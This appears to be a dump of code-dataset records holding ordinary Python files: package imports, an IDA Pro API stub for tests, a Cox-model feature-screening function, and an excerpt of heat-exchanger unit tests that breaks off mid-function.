Dataset schema (one row per file): `hexsha`, `size`, `ext`, `lang`; for each of the max-stars / max-issues / max-forks dimensions: `repo_path`, `repo_name`, `repo_head_hexsha`, `repo_licenses`, `count`, and event min/max datetimes; `content`; line-length and alphanumeric statistics; a family of `qsc_code_*` and `qsc_codepython_*` quality-signal columns (character-class fractions, n-gram duplication fractions, AST-based flags); `effective`; `hits`. Each record below is shown as its repo metadata followed by the file content.
d8dd6f3d149d91791e939ec5c7b8aa6217eba907 | strimadec/models/modules/__init__.py | borea17/StrImaDec @ 711e14d50ff816585b43c1509355983738b45ecb | MIT | Python | 337 B

```python
from strimadec.models.modules.VAE import VAE
from strimadec.models.modules.CNN_VAE import CNN_VAE
from strimadec.models.modules.BaselineNet import BaselineNet
from strimadec.models.modules.LocalizationNet import LocalizationNet
from strimadec.models.modules.RNN import RNN
from strimadec.models.modules.AIR_BaseClass import AIR_BaseClass
```
d8ecf94e5a34ee733ca625e4355d8a07fbd71222 | tests/inspectdb/admin.py | agilentia/django-salesforce @ cb71f30452aee7d1f990eb7184085d87376fb36e | MIT | Python | 138 B | 251 stars, 196 issues, 68 forks

```python
from salesforce.testrunner.example.universal_admin import register_omitted_classes

from . import models

register_omitted_classes(models)
```
9978f8bbe7c5b03c64bfc8b55f53d88ae30e4d93 | tests/mockidaapi.py | BinaryAnalysisPlatform/bap-ida-python @ d8d4679de2f50bb75f556419565821d95404034e | MIT | Python | 485 B | 81 stars, 22 issues, 29 forks

```python
# flake8: noqa
ASKBTN_YES = 0
ASKBTN_NO = 0
ASKBTN_CANCEL = 0
PLUGIN_DRAW = 0
PLUGIN_HIDE = 0
PLUGIN_KEEP = 0
PLUGIN_FIX = 0


class plugin_t(object): pass
class text_sink_t(object): pass
class Choose2(object): pass


def idadir(sub): return NotImplemented
def get_cmt(ea, off): return NotImplemented
def set_cmt(ea, off): return NotImplemented
def askyn_c(dflt, title): return NotImplemented
def get_input_file_path(): return NotImplemented
def get_segm_name(ea): return NotImplemented
```
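A mock module like the one above is only useful once plugin code can import it in place of the real IDA Pro API. A minimal sketch of one way that might be wired up (the injection workflow and the `fake_idaapi` name are assumptions for illustration, not taken from the repo):

```python
import sys
import types

# Build a fake 'idaapi' module from stand-in definitions like those in
# mockidaapi.py and register it in sys.modules BEFORE the plugin is imported,
# so that 'import idaapi' inside plugin code resolves to the mock.
fake_idaapi = types.ModuleType('idaapi')
fake_idaapi.ASKBTN_YES = 0
fake_idaapi.PLUGIN_KEEP = 0
fake_idaapi.idadir = lambda sub: NotImplemented  # stand-in, like the mock above

sys.modules['idaapi'] = fake_idaapi

import idaapi  # resolves to the mock registered above, not real IDA

print(idaapi.idadir('plugins'))  # NotImplemented
```

Because the mock's functions all return `NotImplemented`, tests can detect any code path that accidentally relies on a real IDA return value.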
41ff666cd48bcad470be1b74b59fee9b8bd04243 | rfcn/symbols/__init__.py | YAMLONG/Deformable-ConvNets @ ea937451e103ba1fbf4fdcbd08ef3ca1ca832ef4 | Apache-2.0 | Python | 137 B

```python
import resnet_v1_101_rfcn
import resnet_v1_101_rfcn_dcn
import deform_conv_demo
import deform_psroi_demo
import resnet_v1_101_rfcn_light
```
85262588b7274bb974e3f5c5663002ebe04e9b8d | src/djai/data/api/__init__.py | Django-AI/DjAI @ 85e624de78726ac52f42580121e1a04efe2da2d7 | MIT | Python | 812 B | 3 stars, 1 fork

```python
"""DjAI Data API."""


from sys import version_info

from djai.data.models import (
    DataSchema, DataSet,
    InDBJSONDataSet, JSONDataSet,
    NumPyArray, PandasDataFrame,
    AudioDataSet,
    CSVDataSet,
    HDFDataSet,
    ImageDataSet,
    ORCDataSet,
    ParquetDataSet,
    TextDataSet,
    TFRecordDataSet,
    VideoDataSet,
    LiveAPIDataSource,
)

if version_info >= (3, 9):
    from collections.abc import Sequence
else:
    from typing import Sequence


__all__: Sequence[str] = (
    'DataSchema', 'DataSet',
    'InDBJSONDataSet', 'JSONDataSet',
    'NumPyArray', 'PandasDataFrame',
    'AudioDataSet',
    'CSVDataSet',
    'HDFDataSet',
    'ImageDataSet',
    'ORCDataSet',
    'ParquetDataSet',
    'TextDataSet',
    'TFRecordDataSet',
    'VideoDataSet',
    'LiveAPIDataSource',
)
```
517069b1bd4e2156d870aa839ce002b08576754e | py/univariate_analysis.py | vittoriofortino84/OnlineLearningForBD @ f31dfbf71729b19a80ea1ada8ac1d03c83637352 | MIT | Python | 1,411 B

```python
import pandas as pd

from cox_model import CoxModel, LifelinesCoxModel


def univariate_analysis(x, y, model: CoxModel = LifelinesCoxModel(), alpha=0.0):
    res = pd.DataFrame(columns=['feature', 'score', 'p_val', 'coefficient'])
    pos = 0
    for feat_name in x:
        feat_df = x[[feat_name]]
        feat_predictor = model.fit_estimator(x_train=feat_df, y_train=y, alpha=alpha)
        score = feat_predictor.score(x_test=feat_df, y_test=y)
        p_val = feat_predictor.p_vals()[0]
        coefficient = feat_predictor.params()[feat_name]
        res.loc[pos] = [feat_name, score, p_val, coefficient]
        pos += 1
    res.sort_values(by=['p_val'], inplace=True, ignore_index=True)
    return res


def univariate_analysis_with_covariates(x, y, cov, model: CoxModel = LifelinesCoxModel(), alpha=0.0):
    res = pd.DataFrame(columns=['feature', 'score', 'p_val', 'coefficient'])
    pos = 0
    for feat_name in x:
        feat_df = pd.concat(objs=[cov, x[[feat_name]]], axis=1)
        feat_predictor = model.fit_estimator(x_train=feat_df, y_train=y, alpha=alpha)
        score = feat_predictor.score(x_test=feat_df, y_test=y)
        p_val = feat_predictor.p_vals()[feat_name]
        coefficient = feat_predictor.params()[feat_name]
        res.loc[pos] = [feat_name, score, p_val, coefficient]
        pos += 1
    res.sort_values(by=['p_val'], inplace=True, ignore_index=True)
    return res
```
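The scan above only relies on the `CoxModel` interface (a `fit_estimator` returning an object with `score`, `p_vals`, and `params`), so it can be exercised without the Cox/lifelines dependency. A minimal sketch with a hypothetical `DummyCoxModel` that "fits" a single-feature correlation (all names below are stand-ins for illustration, not from the repo):

```python
import numpy as np
import pandas as pd


class DummyPredictor:
    """Hypothetical fitted-model stand-in exposing the interface the scan needs."""
    def __init__(self, feat, r):
        self._feat, self._r = feat, r

    def score(self, x_test, y_test):
        return self._r ** 2                # pseudo goodness-of-fit

    def p_vals(self):
        return [1.0 - abs(self._r)]        # fake p-value: strong features rank first

    def params(self):
        return {self._feat: self._r}


class DummyCoxModel:
    """Hypothetical CoxModel stand-in: correlates one feature with the outcome."""
    def fit_estimator(self, x_train, y_train, alpha=0.0):
        feat = x_train.columns[0]
        r = float(np.corrcoef(x_train[feat].to_numpy(), np.asarray(y_train))[0, 1])
        return DummyPredictor(feat, r)


# Toy data: one informative feature, one pure-noise feature.
rng = np.random.default_rng(0)
y = rng.normal(size=50)
x = pd.DataFrame({'signal': y + rng.normal(scale=0.1, size=50),
                  'noise': rng.normal(size=50)})

# The univariate_analysis scanning loop, inlined with the stand-in model:
res = pd.DataFrame(columns=['feature', 'score', 'p_val', 'coefficient'])
for pos, feat_name in enumerate(x):
    predictor = DummyCoxModel().fit_estimator(x_train=x[[feat_name]], y_train=y)
    res.loc[pos] = [feat_name, predictor.score(x[[feat_name]], y),
                    predictor.p_vals()[0], predictor.params()[feat_name]]
res.sort_values(by=['p_val'], inplace=True, ignore_index=True)

print(res['feature'].tolist())  # 'signal' ranks ahead of 'noise'
```

Sorting by `p_val` with `ignore_index=True` is what turns the per-feature fits into a ranked screen, which is the point of the real function.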
517b534ba5c55e598c7bdeb8aa94157e4c0ae84b | tests/test_addons/a_lib.py | lexman/tuttle @ dab07db4a1e3e18c876deb2897c07be3935acd60 (issues/forks tracked via Pandinosaurus/tuttle) | MIT | Python | 34 B | 26 stars, 11 issues, 3 forks

```python
def a_function():
    return '42'
```
51b1f274154111c32893c63a58a706cfad811a2d | at_ml/__init__.py | mhasanbulli/at_ml @ 9fb6508e26cf7f48ad9be2221c168337b1b25ae3 | MIT | Python | 66 B

```python
from at_ml.dataset import dataset
from at_ml.model import lof_lgbm
```
cfbab5b9527e81478b93342c727e7a823140608e | unit_tests/test_heat_exchanger.py | J-A-St/moc_retrofit_ga_de @ ddb5a6b04c8a354399693fac40a667f43b7bb577 | Apache-2.0 | Python | 63,291 B (excerpt)

```python
import os
import sys
import platform

import mock
import numpy as np

operating_system = platform.system()
if operating_system == 'Windows':
    sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))) + '\\src')
elif operating_system == 'Linux':
    sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))) + '/src')

from read_data.read_case_study_data import CaseStudy
from heat_exchanger_network.heat_exchanger.heat_exchanger import HeatExchanger
from heat_exchanger_network.exchanger_addresses import ExchangerAddresses
from heat_exchanger_network.thermodynamic_parameter import ThermodynamicParameter


def setup_module():
    """Setup testing model"""
    os.chdir(os.path.dirname(os.path.abspath(__file__)))
    os.chdir('..')
    test_case = CaseStudy('JonesP3.xlsx')
    os.chdir('unit_tests')
    test_addresses = ExchangerAddresses(test_case)
    test_parameter = ThermodynamicParameter(test_case, test_addresses)
    test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
    return test_exchanger, test_case, test_addresses, test_parameter


def test_topology():
    test_exchanger, test_case, exchanger_adresses, _ = setup_module()
    heat_exchanger_topology = np.array(test_case.initial_exchanger_address_matrix, dtype=int)[0, 1:9]
    heat_exchanger_topology.tolist()
    heat_exchanger_topology[3] = not heat_exchanger_topology[3]
    heat_exchanger_topology[4] = not heat_exchanger_topology[4]
    heat_exchanger_topology[5] = not heat_exchanger_topology[5]
    heat_exchanger_topology[6] = not heat_exchanger_topology[6]
    heat_exchanger_topology[7] = not heat_exchanger_topology[7]
    exchanger_adresses.matrix[0, 0] += 1
    exchanger_adresses.matrix[0, 1] += 1
    exchanger_adresses.matrix[0, 2] += 1
    exchanger_adresses.matrix[0, 3] = not exchanger_adresses.matrix[0, 3]
    exchanger_adresses.matrix[0, 4] = not exchanger_adresses.matrix[0, 4]
    exchanger_adresses.matrix[0, 5] = not exchanger_adresses.matrix[0, 5]
    exchanger_adresses.matrix[0, 6] = not exchanger_adresses.matrix[0, 6]
    exchanger_adresses.matrix[0, 7] = not exchanger_adresses.matrix[0, 7]
    for indice in enumerate(heat_exchanger_topology):
        assert heat_exchanger_topology[indice[0]] == test_exchanger.topology.address_vector[indice[0]]
    assert test_exchanger.topology.initial_existent != test_exchanger.topology.existent


def test_operation_parameter():
    test_exchanger, test_case, _, _ = setup_module()
    initial_area = test_case.initial_exchanger_address_matrix['A_ex'][0] * 1.2
    assert initial_area == test_exchanger.operation_parameter.initial_area * 1.2


def test_logarithmic_temperature_differences_no_mixer():
    test_exchanger, test_case, test_addresses, test_parameter = setup_module()
    with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
        mock_property_1.return_value = np.array([[400 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_2.return_value = np.array([[300 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_3.return_value = np.array([[250 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_4.return_value = np.array([[350 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        for operating_case in test_case.range_operating_cases:
            logarithmic_mean_temperature_difference = 400 - 350
            assert logarithmic_mean_temperature_difference == test_exchanger.operation_parameter.logarithmic_mean_temperature_differences_no_mixer[operating_case]
    test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
    with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
        mock_property_1.return_value = np.array([[400 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_2.return_value = np.array([[300 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_3.return_value = np.array([[290 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_4.return_value = np.array([[350 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        for operating_case in test_case.range_operating_cases:
            logarithmic_mean_temperature_difference = (10 - 50) / np.log(10 / 50)
            assert logarithmic_mean_temperature_difference == test_exchanger.operation_parameter.logarithmic_mean_temperature_differences_no_mixer[operating_case]


def test_area():
    test_exchanger, test_case, test_addresses, test_parameter = setup_module()
    with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
        mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_3.return_value = np.array([[250 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        test_parameter.heat_loads[:, :] = 2000
        hot_streams = test_case.hot_streams
        cold_streams = test_case.cold_streams
        topology = test_exchanger.topology
        logarithmic_mean_temperature_difference = np.zeros([test_case.number_operating_cases])
        areas = np.zeros([test_case.number_operating_cases])
        for operating_case in test_case.range_operating_cases:
            temperature_difference_1 = test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case] - test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case]
            temperature_difference_2 = test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case] - test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case]
            if temperature_difference_1 == temperature_difference_2:
                logarithmic_mean_temperature_difference[operating_case] = temperature_difference_1
            else:
                logarithmic_mean_temperature_difference[operating_case] = (temperature_difference_1 - temperature_difference_2) / np.log(temperature_difference_1 / temperature_difference_2)
        for operating_case in test_case.range_operating_cases:
            overall_heat_transfer_coefficient = 1 / (1 / hot_streams[topology.hot_stream].film_heat_transfer_coefficients[operating_case] + 1 / cold_streams[topology.cold_stream].film_heat_transfer_coefficients[operating_case])
            areas[operating_case] = test_exchanger.operation_parameter.heat_loads[operating_case] / (overall_heat_transfer_coefficient * test_exchanger.operation_parameter.logarithmic_mean_temperature_differences_no_mixer[operating_case])
        for operating_case in test_case.range_operating_cases:
            assert areas[operating_case] == test_exchanger.operation_parameter.needed_areas[operating_case]
        assert np.max(areas) == test_exchanger.operation_parameter.area
    test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
    with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.heat_loads', new_callable=mock.PropertyMock) as mock_property_1, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
        mock_property_1.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_2.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_3.return_value = np.array([[250 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        for operating_case in test_case.range_operating_cases:
            assert np.isnan(test_exchanger.operation_parameter.needed_areas[operating_case])


def test_logarithmic_temperature_differences():
    test_exchanger, test_case, _, test_parameter = setup_module()
    with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
        mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        test_parameter.heat_loads[:, :] = 2000
        for operating_case in test_case.range_operating_cases:
            logarithmic_mean_temperature_difference = test_exchanger.operation_parameter.heat_loads[operating_case] / (test_exchanger.operation_parameter.overall_heat_transfer_coefficients[operating_case] * test_exchanger.operation_parameter.area)
            assert logarithmic_mean_temperature_difference == test_exchanger.operation_parameter.logarithmic_mean_temperature_differences[operating_case]


def test_mixer_type(monkeypatch):
    test_exchanger, test_case, _, test_parameter = setup_module()
    with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
        mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        test_parameter.heat_loads[:, :] = 2000
        monkeypatch.setattr('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.random_choice.__defaults__', (0,))
        assert 'admixer_cold' in test_exchanger.operation_parameter.mixer_types
        monkeypatch.setattr('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.random_choice.__defaults__', (None,))
        test_exchanger.operation_parameter.one_mixer_per_hex = False
        del test_exchanger.operation_parameter.__dict__['mixer_types']
        base_case = np.squeeze(np.argwhere(test_exchanger.operation_parameter.needed_areas == test_exchanger.operation_parameter.area))
        for operating_case in test_case.range_operating_cases:
            if operating_case != base_case:
                assert test_exchanger.operation_parameter.mixer_types[operating_case] != test_exchanger.operation_parameter.mixer_types[base_case]


def test_bypass_hot_stream():
    test_exchanger, test_case, _, test_parameter = setup_module()
    with mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
            mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
        mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
        mock_property_5.return_value = ['none', 'bypass_hot']
        test_parameter.heat_loads[:, :] = 2000
        for operating_case in test_case.range_operating_cases:
            assert test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case]
            assert test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case]
            assert test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case]
            if operating_case == 0:
                assert test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case]
            elif operating_case == 1:
                assert abs(test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] - (test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case] - test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case] * test_exchanger.operation_parameter.mixer_fractions_hot_stream[operating_case]) / (1 - test_exchanger.operation_parameter.mixer_fractions_hot_stream[operating_case])) <= 10e-3
            temperature_difference_1 = test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case]
            temperature_difference_2 = test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case]
```
if temperature_difference_1 == temperature_difference_2:
logarithmic_mean_temperature_difference = temperature_difference_1
else:
logarithmic_mean_temperature_difference = (temperature_difference_1 - temperature_difference_2) / np.log(temperature_difference_1 / temperature_difference_2)
assert abs(logarithmic_mean_temperature_difference - test_exchanger.operation_parameter.logarithmic_mean_temperature_differences[operating_case]) <= 10e-3
def test_admixer_hot_stream():
test_exchanger, test_case, _, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'admixer_hot']
test_parameter.heat_loads[:, :] = 2000
for operating_case in test_case.range_operating_cases:
assert test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case]
assert test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case]
assert test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case]
if operating_case == 0:
assert test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case]
elif operating_case == 1:
assert abs(test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] - (test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case] + test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case] * test_exchanger.operation_parameter.mixer_fractions_hot_stream[operating_case]) / (1 + test_exchanger.operation_parameter.mixer_fractions_hot_stream[operating_case])) <= 10e-3
temperature_difference_1 = test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case]
temperature_difference_2 = test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case]
if temperature_difference_1 == temperature_difference_2:
logarithmic_mean_temperature_difference = temperature_difference_1
else:
logarithmic_mean_temperature_difference = (temperature_difference_1 - temperature_difference_2) / np.log(temperature_difference_1 / temperature_difference_2)
assert abs(logarithmic_mean_temperature_difference - test_exchanger.operation_parameter.logarithmic_mean_temperature_differences[operating_case]) <= 10e-3
def test_bypass_cold_stream():
test_exchanger, test_case, _, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_cold']
test_parameter.heat_loads[:, :] = 2000
for operating_case in test_case.range_operating_cases:
assert test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case]
assert test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case]
assert test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case]
if operating_case == 0:
assert test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case]
elif operating_case == 1:
assert abs(test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case] - (test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case] - test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case] * test_exchanger.operation_parameter.mixer_fractions_cold_stream[operating_case]) / (1 - test_exchanger.operation_parameter.mixer_fractions_cold_stream[operating_case])) <= 10e-3
temperature_difference_1 = test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case]
